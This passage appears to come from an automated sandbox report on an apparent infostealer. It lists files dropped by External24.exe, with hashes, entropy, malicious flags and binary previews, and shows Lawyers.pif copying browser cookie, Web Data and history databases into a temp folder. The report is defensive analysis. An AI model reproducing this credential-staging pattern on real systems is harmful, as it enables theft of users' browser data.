..Q....!...ru...p.........u..<....Zu..Q...{X...Mu......Eu..Q...{X...

C:\Users\user\AppData\Local\Temp\Sharon

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	7.995527250113031
Encrypted:	true
SSDEEP:	768:cADfTtcEAB9vXZTHe/T2jy6vorQDf4cLcazeJuTYOUkTBniWkPm:fDfTqEsvZGUfQQDfdcCAOvBn2O
MD5:	5CACD6E1936E71B02ACD561266E159CE
SHA1:	284F0C3A7D4251E7937796B8C53F25ECD9C06A40
SHA-256:	2BBEDE3474F225FDBAD8358FBB20F82576A3373F76ED363095D81F88FEAC30BA
SHA-512:	8534F3FF0B4DCB8622ED32C294CCAEF94E9042A00002ADEA3942A91F1FDB820F63869A47C2193D581E880F7ACBB5132E89F7CCC0CE6393F27153FB39BDA347BF
Malicious:	true
Preview:	C.#.$..v..~..J.4..._....M.H._..J..b]ql..h.@..j &...C.b..9v..b.Q2.'P.^..k.D.....X.^pQ..v;![_....Q..N..#T10w.q=+........6...d.].0(.....j.........hb.+...^I.Q.j..s....m6Zp..:!.....9$H..].......g..m...sVZ..AS...R1j<.+.y...4..m.1.=7....5.].)s<.PT...I.yd.4.B....#.p....PF..T..2.G."-.....F....X.(.M.U8.KU.....&I.'A%.f....M.....K..Y...G.B.uo.7.`f.U....d..k..x.A..Z.}gs.SJ.)5.I~0....i....L..X..+..8UPM.s.s)u....j..>;.T..R..f.E.........,..Kj.\|..p&E..\|.........h!.g6..)..".;L7.I.w...y.....F.)...\Le......r.....,.s..s...v.Ci'..2..6,.{....,??FF.,!.BG...w..2 .?a...Y.<Q.,]4j..~....q[.~.h..yN..G..\b........X.\|$..._...."...pP........1.;(0.....o.B.+.`Iti.R .]...\.8@..zBm.E.M}....M./..H.d..9.@../..x?:))...tIy.R*.F.8...{...\...lI.h5.......q...\`.......... .t.x..?@....Ddm....2.-.....g.~4...s..X......n'...l'.wvd.6.8.)o......,.........y#7.g';...E..Dd\..R..:.....f.z..%x....:.PWeQv....X....6...v.....1.B..M....k]...>b..............#.....}I.$...t..C....

C:\Users\user\AppData\Local\Temp\Situation

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	6.665234278004425
Encrypted:	false
SSDEEP:	1536:Cui3vylIusu0B4MmHtt1OPeRQnz4qDZxj/a:di3n3mLvQzt9w
MD5:	71E552ACF27B7198855203A7A6A25099
SHA1:	4F79A8D7EDDADF66362D7439057FA2A34076D5D2
SHA-256:	73DBE22328916C224F2505C96043C966A74A711490E523A48F7FBBF2D4D90160
SHA-512:	A061FFD48811F6B864F75C2F08566FB9AE07305465294DD2AC752D5A5F178EB49C6687FAA8EA4459B1817E9CFCDA544D753FC41FCDE66A70ACB03A569C56F98B
Malicious:	false
Preview:	.E.@P..D...u...D....C...Cf.;w......3.@..U.......<F...M...M...E.SV..3.W...].3.}.B.M..U..u..M.}....2......E............0....TJ..4....UJ..8....VJ..<...@WJ........................j(Z.M.f9...YD...............}...E.......~...... .....F.........#.;...p.....j.Y%..p....F...M.3..@.....\|......D.....P.....@.....@.....X.....U...t.....p.....`.....d.....\....U..U..l........h.........H...f9.t..@.Af9.u...O.U...L......w.U..E.E..@....E....f..@....E.P..0....U.PR.E..x...P.E.T...P.E.].P.E.PRRRR.E.P.E.P.U......u...4.....H...M.M........Q...9u...<F....d......`......4E8...V..<dJ...Y.........s.3...ERCP.E..C..E..C..E.C..E..C.3..C.j.Xf.C"f..d...f.C$f..`...f.C&3..C(.C,.s0.s4..p.....t....u..u...p.....x.....C"..C..\.....C$..K&....@.....P.....`....u..u..u..u...T....<J.}...D.......iE...E.U.E.....Vf....0...PV.K..E.P.E.}.P.E.P.E.PVVVV.E.P.E.P.K...f..p.....4f.C.f..\|...f.C f..x...f.C..E.....C..}....CE...E.E.E.E.u.3.u...u..E.f9.../E...E.3.f......E.+...;E....E....P.....@...;....E....l.

C:\Users\user\AppData\Local\Temp\Therefore

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	7.998651689867188
Encrypted:	true
SSDEEP:	3072:a+rMd9gipYDDMJb75ojsakxPOciEzJzjYrGgb+d1kRuFBTR1chQ:a8McIRojxkxGci2JaLbmoeB72Q
MD5:	93F784793E7649CDAFF272E29EBE301C
SHA1:	E22733703BCF129EA7CCB43653C35B28768469C8
SHA-256:	5A5537DF0CFB09E962D69FC8A7D24B1509A6B1274B1473621B5E91B1FEB589FA
SHA-512:	D601A297BBBB6E09CB5079F189124F3F8B54E65B8D907201D9102FD7C3E5B75D2A2215FA574D9845983F011375EDA31CBFE528C424266F10CE5069C35CE2E83A
Malicious:	true
Preview:	.X...o...S..M9..7]nd;.f.vw.$....3..w.u9.t..."....[......2.KA.#x.....$..."S..e.sC? ...`A..O.....&%..y...B...+(G....9.'..`. (Q8.h...?...:4E.N..e...(.p..N.h.....c.hD....J.K. .....i.98...Ub._.:..!x!..q>.-....3..T../_..4A.....9..0g.6.....D..8,..F..}.bI-\M.t..n.7......5.Q....s'.?......h..lT.T?..).'B.H..5.D^fghl..^4..E"..B5>...JH\|.A.Y..g2.m....`..S.. u~..x}.<...O.w#o,...U.UW.gU.5!......1...d.}:.\|0..k.["%T.)\..]..3.+...S...v.......2...[..I..f.......?>.K.^.eM.T...f~':....!r..I..?.GCD...WX._W.K.......l........ t..".Y.T#.cp&.1....~`..7..T..7<..s.n.Y.=I -9..lU.y,.f.2e.l....,3....{v..".}..J.L.O_.F. ..}..=0s..%.Z?..sC\..h.V...M!...yr...._...%I...[w......./;g&..........^..%p.. \....(..J.e....j..BR..}..0....54....>...x...~.&._.w..%(a..C.W.K.q....G..{...1...F5....V.KY\|F!.k.....0.Z._.,..c.....V..\.:..yZ..e$.<..3....w..U..xd.S......C..O....'..R....6.......{i.mDFaYZ.....$..?......"..)...m.)./..M4.Q...>...X...h.MKv.q.1...q..N.m....=.m.p.gS

C:\Users\user\AppData\Local\Temp\Translator

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	27648
Entropy (8bit):	4.7058104110784935
Encrypted:	false
SSDEEP:	384:h5nqccokn7IEV0pQfsKuEpzhQVNt2bSSk/ju9oiPqYaPuMHIpmD:h5qcaTlKWzhQVNsbSSkLQ7PqYIueIA
MD5:	0CE52773F57062CA0408B7A302F8C4A3
SHA1:	525ECA6E86BBBA75714445067FFD540A0AD2A1BE
SHA-256:	FF35B8C8BCD510A4B2A42AA117EA073D864816B919CC520E840D9E8582ED5006
SHA-512:	FD6ED1159536571D39F95B0667DC1C0566D1156009B450BB8C0DFDCAB2BB1E1547D109B92CD0065EDAD17937FEA8E4545059C5FCC573428C212E13302D358D1D
Malicious:	false
Preview:	....L.........L.........L.........L.........L......L.\4I.....L..DG.....L.........L.........L.........L.........L......L.\|4I.....L..FG.....L.........L.........L.........L.........L......L.\2I.....L...H... .L.......$.L.......(.L.......,.L.......0.L....4.L..1I...@.L...@...D.L.......H.L.......L.L.......P.L.......T.L....X.L..-I...d.L..GG...h.L.......l.L.......p.L.......t.L.......x.L....\|.L..1I.....L..8H.....L.........L.........L.........L.........L......L../I.....L.q9H.....L.........L.........L.........L.........L......L..0I.....L.B>H.....L.........L.........L.........L.........L......L.p1I.....L..>H.....L.........L.........L.........L.........L......L..1I.....L..>H.....L....... .L.......$.L.......(.L.......,.L....0.L.H/I...<.L..>H...@.L.......D.L.......H.L.......L.L.......P.L....T.L.@.I...`.L..?H...d.L.......h.L.......l.L.......p.L.......t.L....x.L..0I.....L..?H.....L.........L.........L.........L.........L......L..0I.....L.!AH.....L.........L.........L.........L.........L......L..2I.....L

C:\Users\user\AppData\Local\Temp\Trunk

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	6.659812118233853
Encrypted:	false
SSDEEP:	384:+etbWk06XtasmC84Ll9iRrNXxdB1gv4PSTNVvmQXPMYSckSli:rXtiC84Ll9iRfdB1gpjXgckS0
MD5:	80F96EE06B4301434276F77766968F18
SHA1:	FDB8104A509C4E07ADE26455C82842B47C35AD7C
SHA-256:	BD1FE682C0A0F70531AA2A7727D121A9953F8E7F003585600C4D090B841E0B61
SHA-512:	0FBFE53DC9EEBE2CA22F03BD053424B94B1A0EBFB85BD3F0E6E1AB3C6DC81DA3B044EC9784C0DF055C58F152F7E5684A2A8F951455B135A18DC7CB23DB167689
Malicious:	false
Preview:	*...Y..t.3.Cf.<w.u.CWF.....Y;.r.]..].h..K.W.).....YY..t6.}.SV.....YPV.u.....I.9;~..;h..K.j........YY..u.}..}.C...E..M....C..E...u.P.....W.....YY_^[..].U..SVW...tL.........j.h.MF.V...bL...x.I..M.W...._^[].U....V.u.........uOV..P.I...u..=.bL..u;.M..u.......E.P.M..Ug...E..tL.P......h.;I........M..R...3.@^..].....y....+........u.3.......U....S3.f.E....E..].PSSSSSSh ...j j..E.P..X.I...M...t!.E.P.u.S..\.I..u.....!E...d.I..M.3....[.....].U...$SV..M.W........M......3.U.SSS...).......U...SSS.........E..M.SP........M.....n....M..f..._^..[..].Q....I....t...t....2..V..V.....Y..t.V.....Y..u.f..u.3.@^.3.^.U..Q.E.Ph....j.3.PPPQ..t.I.........].U....SVW.}...3..E....bL.....t2...bL......I..E.3.E..}.PQ.E.Ph.SF.QQ...........E..u..u.SP....I.....t.j.V...bL....l.I.V..X.I..=.bL..u........_^[..].U....V......+...j...#..+.u..E.....#....M.E..E...E..E.P....I.^..].V..f.>.......h,SK.V....YY........hPSK.V....YY..u.j.X^.hl.K.V....YY..u.j...h\|.K.V.q...YY..tEh..K.V.`...YY..t4h..K.V.O...YY..t.

C:\Users\user\AppData\Local\Temp\Viruses

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	29696
Entropy (8bit):	6.587553799715058
Encrypted:	false
SSDEEP:	768:Dcax2OCkQuG4ypQ9Fsqib9futLZzWaIxyKw7n9:X2kQyyy9FskzWaIxOR
MD5:	D874CA1BEA8A951EEE9A526A39DCBD97
SHA1:	B05C3C0B19C53B0B16A6E133A70E81F2A1318355
SHA-256:	9641A75D903C389791BBE0B2FCDAAF9C488A337E1C9D5063151C4C0DD6AFD06D
SHA-512:	43C4DFD832C575C838AB86C758D42EF1E2EC741BA6C07F6C7B255EA7C81C0FA2A36D5613D16833C518918EF160C9E5ACF9E22A352A1E271D046011ABC7DE863E
Malicious:	false
Preview:	...t......t.........t..........`..#.t... ..t....@..t.;.u.......................j@%@...[+.t.-....t.+.u.........................#}...#...;.......P.$...P.E..e'..YY..]..E.3..y.j.Y.....t.........t.........t.........t.........t..........`..#.t... ..t....@..t.;.u.......................%@...+.t.-....t.+.u...........................3.....t............._^[..].U..M.3....t.@...t.......t.......t.......t... ......t....V......W.....#.t#......t.;.t.;.u...........................t.......u......._^......t......].U.....e...E.W..u..F..................tS..V..t\j=S........u.YY..tI;.tE.=.AL.3.8F.....E.;=.AL.u.W........E.Y.=.AL...un9}.t&9=.AL.t........tN..............^[_..]........j.......AL.Y..t. ..=.AL..u.j.......AL.Y..t.. ..=.AL...t...+.PS......YY..xW.?.tR.4.....}..Yu.....}..'......D.....F.<..u.....?snj.V.5.AL......}......tY..AL..R.}..........y...F.;.......=...?..#...Pj..5.AL..b...............}..d.......'..}..}..tjj.S....Y...P.S.....YY..tPSS...Y...PV..........uc..+..M..A.E.......

C:\Users\user\AppData\Local\Temp\Ward

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.395930868350426
Encrypted:	false
SSDEEP:	768:Z+aI4kSmEusWjcdeDvFQC7VkrHpluuxdCvEHKKgItUHih:w+usWjcdmQuklluhvEHKxih
MD5:	A8158877B3365ADDDB006B0C8CB7EAC7
SHA1:	3F4019B5C2C9154463D1D59D96435CC691673411
SHA-256:	D133274D756ECCBA4F401B6230F80CBCC20422A1B1DFD02D36DE25DA0317EFA7
SHA-512:	BD7136DC9E9E81E38DCF4C5D16E123A8F75FB42F12EC8791A3158A33FCAE33578C7C6B6BC6EC2750698EA572DF42289A87AA68B94C789004613126487543B83A
Malicious:	false
Preview:	.?F...<..?.Q'J.`.?x..e_..?* A...?.".Sr..?xw...N.?k..$...?..S/...?..yx\|o.?P.6 d!.?.ZyrI..?.......?.....?.T.....?...!.z.?...{...?..0.V..?.8.I.^.?..A;..?...wC..?.JG7.&.?.'..un.?...)...?m...y..?.......?..\|...?,"..Q..?./...b.?PV3. 2.?..S....?.p....?V.a..".?..Tl...?Pq.j...?....Y..?.p..,.?..l"..?cY.....?.\.3&..<.-DT.!.?........................................UUUUUU.?333333.?.m.m.?....?333333.?.q..q..?UUUUUU.?O..N..?.m.m.?$rxxx..?.......?.......................?.........9..B..@...2b....................................,..d.?........................=..U.&.?UUUUUU.?.................}..=mm?.......?.................u+E6.W?.......?.......................?........................._CN.?.?........F.n<.t.?.........u[.c..?..#.Xu.?.7.&...?.I.v..?...w.\|u?!u$..8.?.."Y.Nu?-HF....?0[....d? cf>..?......c?.......?.-[..6.?...N.}X<.......?.]....?..................'Z.4.?.........e-CS..?.........F.....?..,..w.?(F_.e..?.X2CQ..?....?..w.T..?./V.W..?#.(..7.?... L.?.hC!..?c..(..y?.-...?X1U..u

C:\Users\user\AppData\Local\Temp\Warming

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	185344
Entropy (8bit):	7.999067405980856
Encrypted:	true
SSDEEP:	3072:J+MwdSWacrtSAAkU3wLPsEOzLK6C90Ilp9cHunOi3WdQoK7DYz/sDmqKopSJ:JwdZac5SA1UgpOzLKZ90Iiun9GEDYTfR
MD5:	8C0F67222F42DBC8CD40DC1308896C26
SHA1:	4B9D324D7DD66BC6611D65FEFBD708BE45406028
SHA-256:	AB2B14120114856F5CA25A864D524D73D2945A1B382FA7D608B0FDA302AF93C3
SHA-512:	AD20350A42BEC22F5CEEB03F36B9BEA60BBDAE5EC20319F441A2967BBE09EE0D7FD4B909A71A8621C9EDEB6D3D5EEF277AC72B779F76E01543C140C2276D4F85
Malicious:	true
Preview:	..fm.7:.^..<R.W..)Sd`.......\|....A...J...$+.....T......x.RX.b..ls<U.'...X..)H..Xm6 .....+e........`4..#.J..r..@..%..(.p.(L..vmKa..V."n.......y..@-?V.%...+._...<.K.x..#.]....0.gW.c..;.S.v...n........."lz./c..F)..^}..1....o`9.C..?!.pec.`....j.......h...R..7.U<v..fg........\|.......y.Bl).G........tM....W.Y..N......v&....].<.../...l:....mh.S,.\..\|.N..W.._..=.R....TAI-'.W..u%. ".....x...0....Z.M...7.SbQ.a=..W.{.iS...`.EL#.5m..b7.s..gH#0...RI...Z{:.k.:R.......X6\|;.....t...y8.......v....]...T..%Z0.p6....%.J..@.....!...K..t/.d.R4..k...:G.g.3...DG..`H\|r.`J..-.F.L.n..E..a0U{>Y....f.?e.....a..C.a.... ....%...@..^MjK.^....:...F.y..W.....!E......:..g`.w.7..._S...b....\.L.....^.u95........i..%.p..X..Y{.+.QML..G...!W.X..; . #....J.,......i.^...D.uX8.I'.z....._2OCd.4..=..c.... ...KJ./......l....t...A...f..#.sa........Hj......5W.-.yB...v8....Q..<....hw...>#..=J.'.d1....g.._@F<Q.I...>@...v?KA.N..>....@v..B....FcS...H. .Xn.!.,34. .%.qo.G..Wr

C:\Users\user\AppData\Local\Temp\Wiley

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	142336
Entropy (8bit):	7.998649401070705
Encrypted:	true
SSDEEP:	3072:iqIAQwCnAp9MzfbxI7rqg6mwEZnRLpJ8LkzY9o6sQIarjsAYjTEZ:iqINnmMe7GgDxRdY9RMMY6Z
MD5:	34854E2DD1DD1B2DCE925B524006777D
SHA1:	25B08FBC0FA6F664B2CD4B3AE162238A6DE73484
SHA-256:	E95E2173EDFAE7F353EEBBCE5826F9E248E2F9869F46CFAA81705704A6E207A0
SHA-512:	588B2483F3DBFC19A05A8E33A1F509399DA6C18FF4FEB3819CE8CDD812C801E971BE4877137FDEF38C72B1E63B8D174C33073F8C46E38CCFC6571298BCB27780
Malicious:	true
Preview:	...V\.k/.<......2....o......#...;.....d.....B.;...l.I7>o.Q.....I.."...2.IH>.r.....%d.81.,....Q.....b.?.....Y.]iC.0;.L.2!...I...K&....E.#..L...u.di.Mbr.C.{...gSit...l.jv.H......+.a.PfG.\.R!\|{...T._V..\|.B..Z...r.......\|....XU."W~..j.pi.....`wM.w.s];...v\../.H.%.....L_._z....@(.m....A...7...h?Fdb,@`......s.E..Y<].+A../..,..4...wl...Z.X.-.?FB...G.....-..]....k......5./...X..f...^.....dW...w....,..........mi...$H.=x.kcuS`.b..S........z.=..h.x..t.a..h...F..Y.'\......%.&9.g..+.x..WE.'3...F...'._.txC9....3;v.._E..x..{>x...vO..l4z...#V.g..:P.j.:.......\ q..;...!....=..#.{."6..,......s...t.w..a......K....0...].#..............!....!.....vNi=H.....l..1J)....2c...2...%6...h.N.........Yi....p.E..,..U.`.}D.R7S.p.k..R...DH......V.W6c..........>._.Y.@..$...tW.[b>.V..oT....>.S&.==......DY....HF..@z+...:P).....q.{.x$R.@..6{....CJ:..Z.;.......,...(.{...V.>...O.......Y.....:.ge.i...a..{t..s..(.......c.E$.+..."s..+.f././.1-.....X.6r...oC...)...n!.T....Pm.(.

C:\Users\user\AppData\Local\Temp\Wine

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	74
Entropy (8bit):	3.2227717840781174
Encrypted:	false
SSDEEP:	3:zAXDwGAmAbxcUqt/vll:oA9q
MD5:	8D1C326729423381A209EBE0282FD3F4
SHA1:	41EDF41A924568D0F2455C6F29E8720F226A516B
SHA-256:	0BD6CAD9A4F72818A8044B0F4248C927A1BE370EB41A86BE24BD8DB5137DC569
SHA-512:	82D157007E85322F5F89CBA17EB4257E580F7DE02BA1892E2CFB13604A386E12F9F30BDD7102CCA854C30E18DFC31DD358F4508DE3627F5189CC0B004D0B9BCF
Malicious:	false
Preview:	towersallowancemeaninghelp..MZ......................@.....................

C:\Users\user\AppData\Local\Temp\Zoning

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	80896
Entropy (8bit):	7.997641971418297
Encrypted:	true
SSDEEP:	1536:0Sc+90lM/XpkxpbcCIYLit49mw8+kZzLnMTukdLwsj6yTga9xeJLGp/RdjrWqj:4+KwQbLu4P8+OELzj6y19xeJCBRdfWqj
MD5:	253FBC82FB1420FFAEFF5AC4CCF03464
SHA1:	27AA6500A920F123CF1E5426394E13DFF88AB9C1
SHA-256:	0A2FD3A563E32E9502007CE96056466F5C85CE09FE8CC6BA12D3BC206137CD59
SHA-512:	2C4726F0BD709577B38025C8AE2CCC5DB65CDB2FD646DB8DB0426CD961F9A153D379B2A34663ACF6F9714FE1CA011991443BC2D843977368554A118D36E45D15
Malicious:	true
Preview:	......6..~.[.p...t......_i.d...8..I.'.....T..Q.E&..3...C....F.S.#..;..........o...~.......r...<sK.4r.]R....P...[.#....Y..#A#.....'.&.`...O.F...I....B.)/ ..-........E... ,:.....?a..+...........z@.q.;a...!(0..X..!n.>.bp...b.'..E`.-B....?O...B.r.....T.X...:...td..(.........l0S%.[.....;A.QE..m....I...9.....l...T.6.5....&Y.I......HVCq....Aj...f.4...k.....d.x...R..'8.....p...nw......i9..2_w....hDk.P.L....!.._/..[.r..+Z.".5y..P.g..5.'..\|.......x.1N..Q2!...._..8...E.J.............S.hV.....V,Y.......%r@ .oO.....?...$`Z...\|..Y.P$.t.OpJa..7.d.iR....~:o.n.bc..sbI.R:...f........*o.m\|X...j/....'..d..S...ST......K.$....w.!......}d-;..a..$..,..%r.u.b6K..+[...NT......O#...i.....2$.Kw"..H..Jyq..W.w..%.+...!...X....G...^.2.....XD........[..Gl......C.6y..VW.nY....9..w.#.P...xtw&.\|.^.(.a.gS..T.r..[8...D.u...M.aJF..g..l-...2..Kl.Z.t6.I.....8....R...&.-.@......l!yS<!}...i>.q}."p,J.6.M............R.x{.^.3...{.y....}.....0.-...Y=,;NM...0...

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\02zdBXl47cvzcookies.sqlite

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\0ffAoFEXM0xBWeb Data

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\3b6N2Xdh3CYwplaces.sqlite

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\AJK0mJqpunS2Cookies

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\D87fZN3R3jFeplaces.sqlite

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\DPdylnmTjMlDWeb Data

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\DbHJEiQOxMiMWeb Data

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\IXuJ06djpYzdWeb Data

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
